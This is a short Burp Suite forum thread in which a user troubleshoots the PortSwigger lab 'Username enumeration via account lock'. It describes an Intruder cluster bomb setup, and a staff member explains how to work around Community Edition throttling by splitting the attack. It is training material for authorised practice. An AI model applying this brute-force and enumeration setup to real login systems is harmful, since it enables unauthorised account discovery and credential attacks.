Burp Suite User Forum

Login to post

IT DOESN'T WORK - Lab: Username enumeration via account lock

Dario | Last updated: Feb 23, 2023 07:57AM UTC

I have tried replicating the attack multiple times in multiple modes, looking at both solutions and other walktroughs found on the net, but it does not work. I take the POST, send it to the intruder, in position I put username=§test§&password=qwerty§§ and choose cluster bomb. In payloads set 1 I put the user In payloads set 2 I put null payloads set to 5 In setting I put Grep - Extract with " Invalid username or password" I launch the attack. At the end I have all statuses at 200, all Lenghts at 3005 and all warnings with "invalid user name" I can't tell if I'm doing something wrong, but I feel like I copied everything perfectly Translated with www.DeepL.com/Translator (free version)

Ben, PortSwigger Agent | Last updated: Feb 23, 2023 08:17AM UTC

Hi Dario, Are you using Burp Professional or Burp Community edition for this lab?

Dario | Last updated: Feb 23, 2023 02:41PM UTC

Hi! Burp Community Edition

Ben, PortSwigger Agent | Last updated: Feb 24, 2023 07:48AM UTC

Hi Dario, The Intruder tool is throttled within the Community edition of Burp, which does impact some of the brute force type labs. For this particular lab (and some of the others that use Intruder) you would need to break up your attack into smaller subsets to get round this throttling i.e. rather than performing a single, large attack that has all of the usernames configured perform several smaller attacks that contain a subset of the supplied usernames each time.

Dario | Last updated: Feb 24, 2023 01:27PM UTC

ok i'll try as you said, thanks a lot

Marcel | Last updated: Apr 07, 2023 04:27AM UTC

Could a warning be added to the labs that have this issue with the community edition? It's very frustrating to debug why the lab isn't working even though you're following the exact steps. Thanks, Marcel

Ben, PortSwigger Agent | Last updated: Apr 07, 2023 07:43AM UTC

Hi Marcel, We can certainly discuss this with Web Academy team to see if it is something that we can add (we have already raised a request to label labs that absolutely require the use of Burp Professional).

You need to Log in to post a reply. Or register here, for free.